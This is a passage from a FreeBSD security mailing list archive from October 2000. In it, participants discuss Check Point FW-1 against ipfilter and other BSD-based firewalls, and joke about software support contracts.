asses covered. > > For the record, you can't sue anyone who's got the "standard" software > license/disclaimer over the failure of it to perform or be bug free. > Read it one day and actually see what it's all about. But you can threaten to stop paying them tens of thousands of dollars in customer/technical non-support contract fees if they don't come up with a fix real fast. You should sell support contracts for ipfilter, Darren. The people could threaten YOU with cutting off the contracts you'll learn to hate. Small incentive. > What is really the difference is being able to dial 1-800-FIREWALL and > have someone help you out, etc. Well, at least have someone to answer the phone and listen while you rant. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Oct 7 21:45:30 2000 Delivered-To: freebsd-security@freebsd.org Received: from cairo.anu.edu.au (cairo.anu.edu.au [150.203.224.11]) by hub.freebsd.org (Postfix) with ESMTP id 1DF4437B502 for ; Sat, 7 Oct 2000 21:45:27 -0700 (PDT) Received: (from avalon@localhost) by cairo.anu.edu.au (8.9.3/8.9.3) id PAA20792; Sun, 8 Oct 2000 15:45:19 +1100 (EST) From: Darren Reed Message-Id: <200010080445.PAA20792@cairo.anu.edu.au> Subject: Re: Check Point FW-1 To: wes@softweyr.com (Wes Peters) Date: Sun, 8 Oct 2000 15:45:18 +1100 (Australia/NSW) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <39DFFBE9.546DFE24@softweyr.com> from "Wes Peters" at Oct 07, 2000 10:45:30 PM X-Mailer: ELM [version 2.5 PL1] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from Wes Peters, sie said: > > You should sell support contracts for ipfilter, Darren. The people could > threaten YOU with cutting off the contracts you'll learn to hate. Small > incentive. I've never been convinced that there's a real market for this given that support contracts are never cheap. If anyone has a blank cheque they're willing to hand over (or wants to seriously talk about this), please let me know. Somehow I think I prefer the idea to just cut code :-) o-o Darren p.s. yes, I'm serious about asking others if they're serious. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Oct 7 23: 8:11 2000 Delivered-To: freebsd-security@freebsd.org Received: from homer.softweyr.com (bsdconspiracy.net [208.187.122.220]) by hub.freebsd.org (Postfix) with ESMTP id 6C28C37B503 for ; Sat, 7 Oct 2000 23:04:58 -0700 (PDT) Received: from localhost ([127.0.0.1] helo=softweyr.com ident=Fools trust ident!) by homer.softweyr.com with esmtp (Exim 3.16 #1) id 13i9k6-0000Nt-00; Sun, 08 Oct 2000 00:15:27 -0600 Message-ID: <39E010FE.8CAA2CB1@softweyr.com> Date: Sun, 08 Oct 2000 00:15:26 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.75 [en] (X11; U; FreeBSD 4.1-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: Gregory Sutter Cc: Craig Cowen , "freebsd-security@FreeBSD.ORG" Subject: Re: Check Point FW-1 References: <39DEBB51.E51BACFB@allmaui.com> <20001006230628.L23587@klapaucius.zer0.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Gregory Sutter wrote: > > On 2000-10-06 22:57 -0700, Craig Cowen wrote: > > The big cheeses at work want to use check point instead of ipf or any > > other open source solution. > > Can anybody help me with vunerabilities to this so that I can change > > thier minds? > > Go search the Bugtraq archives at http://www.securityfocus.com/ for > lots of Checkpoint fun. FW-1 sucks. Mumble mumble NDA mumble mumble can't say any more mumble mumble mumble. "Oh God, and I thought these smelled bad on the outside." There are several commercial firewall products based on FreeBSD (or, shudder, Linux) that are better tools in the hands of someone who will take them to educate themselves. A BSD box running ipfilter or ipfw is very straight- forward to secure, and offers reasonably easy tools for remote configuration like ssh. Others have mentioned a couple of commercial alternatives; add NetMax and GnatBox (right?) to this list. Also, be sure to get a copy of my paper for BSDCon explaining why my company decided to use BSD and ipfilter to build the firewall of the future on. (Sorry, it's not a corporate firewall and is not suited for your use.) -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message